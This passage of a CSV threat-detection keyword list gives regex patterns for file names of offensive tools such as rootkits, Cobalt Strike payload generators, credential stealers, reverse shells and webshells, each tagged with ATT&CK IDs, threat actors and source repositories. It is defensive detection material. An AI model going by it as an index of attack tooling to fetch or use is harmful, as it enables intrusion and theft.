patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14675" "*\Cronos Rootkit.sln*",".{0,1000}\\Cronos\sRootkit\.sln.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14677" "*\Cronos Rootkit\*",".{0,1000}\\Cronos\sRootkit\\.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14678" "*\CronosDebugger.vcxproj*",".{0,1000}\\CronosDebugger\.vcxproj.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14679" "*\Cronos-x64.zip*",".{0,1000}\\Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14680" "*\CrossC2.*",".{0,1000}\\CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","14681" 
"*\CROSSNET\CROSSNET\*",".{0,1000}\\CROSSNET\\CROSSNET\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","14682" "*\cryptomix.txt*",".{0,1000}\\cryptomix\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom 
notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14683" "*\Crypttest\*.encrypted*",".{0,1000}\\Crypttest\\.{0,1000}\.encrypted.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14684" "*\crytox.hta*",".{0,1000}\\crytox\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14685" "*\CScrandle_fileless.cs*",".{0,1000}\\CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14686" "*\csexec.exe*",".{0,1000}\\csexec\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14687" "*\CSExec-master\*",".{0,1000}\\CSExec\-master\\.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14688" "*\csexecsvc.exe*",".{0,1000}\\csexecsvc\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14689" "*\csexecsvc.exe*",".{0,1000}\\csexecsvc\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14690" "*\csexecsvc-net35.exe*",".{0,1000}\\csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14691" 
"*\csexecsvc-net35.exe*",".{0,1000}\\csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14692" "*\csexecsvc-net40.exe*",".{0,1000}\\csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14693" "*\csexecsvc-net40.exe*",".{0,1000}\\csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14694" "*\csexecsvc-net45.exe*",".{0,1000}\\csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14695" "*\csexecsvc-net45.exe*",".{0,1000}\\csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools 
that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14696" "*\CsOnTheFly.ps1*",".{0,1000}\\CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14697" "*\cstealer.py*",".{0,1000}\\cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","14698" "*\Cstrike Rat.exe*",".{0,1000}\\Cstrike\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14699" "*\ctblocker.txt*",".{0,1000}\\ctblocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14700" "*\ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","14701" "*\CultesDesGoules.txt*",".{0,1000}\\CultesDesGoules\.txt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","14702" "*\curlshell.py*",".{0,1000}\\curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse 
shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14703" "*\curlshell-main*",".{0,1000}\\curlshell\-main.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14704" "*\curlshell-main\*",".{0,1000}\\curlshell\-main\\.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14705" "*\CurrentControlSet\Services\BadWindowsService*",".{0,1000}\\CurrentControlSet\\Services\\BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#registry","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14711" "*\CurrentVersion\Run\XenoUpdateManager*",".{0,1000}\\CurrentVersion\\Run\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","14733" "*\CustomEncoding.cpp*",".{0,1000}\\CustomEncoding\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","14744" "*\cve-2014-4113.x64.dll*",".{0,1000}\\cve\-2014\-4113\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14745" "*\cve-2014-4113.x86.dll*",".{0,1000}\\cve\-2014\-4113\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - 
T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14746" "*\cve-2015-1701.x64.dll*",".{0,1000}\\cve\-2015\-1701\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14747" "*\cve-2015-1701.x86.dll*",".{0,1000}\\cve\-2015\-1701\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14748" 
"*\cve-2016-0051.x86.dll*",".{0,1000}\\cve\-2016\-0051\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14749" "*\CVE-2020-0796.x64.dll*",".{0,1000}\\CVE\-2020\-0796\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14750" "*\CVE-2021-1675.x64.dll*",".{0,1000}\\CVE\-2021\-1675\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14751" "*\CVE-2024-49138-POC-main*",".{0,1000}\\CVE\-2024\-49138\-POC\-main.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","14752" "*\Cyber Shell (v 1.0).php*",".{0,1000}\\Cyber\sShell\s\(v\s1\.0\)\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14753" "*\CyberSpy5.Asp*",".{0,1000}\\CyberSpy5\.Asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14759" "*\d00r_py3.py*",".{0,1000}\\d00r_py3\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14760" "*\d0nut.html*",".{0,1000}\\d0nut\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14761" "*\D1rkInject\*",".{0,1000}\\D1rkInject\\.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","14762" "*\dacledit-*.bak*",".{0,1000}\\dacledit\-.{0,1000}\.bak.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14763" "*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14764" "*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
